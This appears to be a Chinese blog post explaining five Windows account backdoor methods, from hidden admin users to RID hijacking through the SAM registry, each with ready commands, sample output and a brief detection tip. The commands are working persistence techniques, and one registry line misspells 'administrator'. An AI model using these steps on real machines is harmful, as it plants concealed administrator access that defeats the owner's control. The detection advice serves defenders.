这里我给大家介绍几种常见的Windows账号后门方法,这些方法在网上已经烂大街了,但可能有的人还不太了解。感兴趣的朋友看完后可以自查一下,看看有没有中标。
一、在登陆界面隐藏用户
net user test This1s@pass /add
net localgroup administrators test /add
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v test /d 0 /f以上添加了管理员用户test,并在登陆界面中隐藏。正常状态下登陆界面左下角是不显示隐藏用户的:
猥琐指数:*
隐藏效果:
1)在登录界面中隐藏。
2)对net user命令不隐藏。
3)对net localgroup users命令不隐藏。
4)对netplwiz.exe隐藏。
5)对lusrmgr.msc不隐藏。
防护方法:
使用lusrmgr.msc及net user命令识别可疑用户。
二、在用户名末尾添加$
net user test$ This1s@pass /add
net localgroup administrators test$ /add猥琐指数:* *
隐藏效果:
1)登录界面不隐藏。
2)对net user命令隐藏。
3)对net localgroup命令不隐藏。
4)对netplwiz.exe不隐藏。
5)对lusrmgr.msc不隐藏。
防护方法:
留意以$结尾的用户名,这很可能是黑客留的后门账号。
三、技术一 + 技术二
net user test$ This1s@pass /add
net localgroup administrators test$ /add
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v test$ /d 0 /f猥琐指数:* * *
隐藏效果:
1)登录界面隐藏。
2)对net user命令隐藏。
3)对net localgroup命令不隐藏。
4)对netplwiz.exe不隐藏。
5)对lusrmgr.msc不隐藏。
防护方法:
留意以$结尾的用户名,这很可能是黑客留的后门账号。
四、启用默认的administrator用户,并在登陆界面隐藏
administrator用户在Windows中是默认禁用的,黑客可能偷偷启用并在登陆界面中隐藏:
net user administrator /active:yes
net user administrator This1s@pass
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v aministrator /d 0 /f
猥琐指数:* * *
隐藏效果:
1)登录界面隐藏。
2)对net user命令不隐藏。
3)对net localgroup命令隐藏。
防护方法:
留意administrator是否被启用,可以考虑把它删除。
五、管理员用户身份劫持
这个方法的亮点在于,可以把任意指定用户的RID修改成管理员的RID(500),从而达到劫持管理员身份的效果。修改成功后,后门用户使用自己的密码进行登陆,但profile为被劫持用户的profile,基本不会受被劫持用户影响,即使被劫持用户被禁用,后门用户仍能正常登陆。
1)创建一个隐藏用户:
net user test$ This1s@pass /add2)通过regedit.exe或命令获得HKLM\sam注册表的控制权限,sam路径默认只有SYSTEM用户能访问:
3)查询注册表获得test用户的RID及需要修改的注册表位置,下面例子中user的RID为1007,对应的十六进制为EF03,其注册表路径为HKLM\sam\sam\domains\account\users\000003EF:
C:\Windows\system32>reg query HKLM\sam\sam\domains\account\users
HKEY_LOCAL_MACHINE\sam\sam\domains\account\users
(默认) REG_DWORD_BIG_ENDIAN
HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F4
HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F5
HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F7
HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000001F8
HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000003E9
HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\000003EF
HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\Names
C:\Windows\system32>reg query HKLM\sam\sam\domains\account\users\names /z /s
HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names
(默认) REG_NONE (0)
HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\Administrator
(默认) REG_NONE (500)
HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\DefaultAccount
(默认) REG_NONE (503)
HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\Guest
(默认) REG_NONE (501)
HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\test$
(默认) REG_NONE (1007)
HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\User
(默认) REG_NONE (1001)
HKEY_LOCAL_MACHINE\sam\sam\domains\account\users\names\WDAGUtilityAccount
(默认) REG_NONE (504)
C:\Windows\system32>4)修改user用户的注册表,把键f值中的EF03改成F401,即为被劫持administrator用户的RID:
reg add HKLM\sam\sam\domains\account\users\000003EF /v f /t REG_BINARY /d 03000100000000003B670807804ED6010000000000000000EDE4F487854ED60100000000000000000000000000000000F401000001020000140000000000000000000000000000000000000000000000 /f
把test$用户从用户组中删除,不会影响权限:
net localgroup administrators test$ /del
net localgroup users test$ /del猥琐指数:* * * *
隐藏效果:
1)登录界面隐藏。
2)对net user命令隐藏。
3)对net localgroup命令隐藏。
4)对netplwiz.exe不隐藏。
5)对lusrmgr.msc不隐藏。
6)可利用WDAGUtilityAccount、Guest等系统自带账号提高隐藏效果。
防护方法:
留意lusrmgr.msc中以$结尾的账号,以及处于启用状态的系统默认账号。
除了提到的这几种常见的方法,还有许多更猥琐的后门技术,这里就不多说了,你懂得。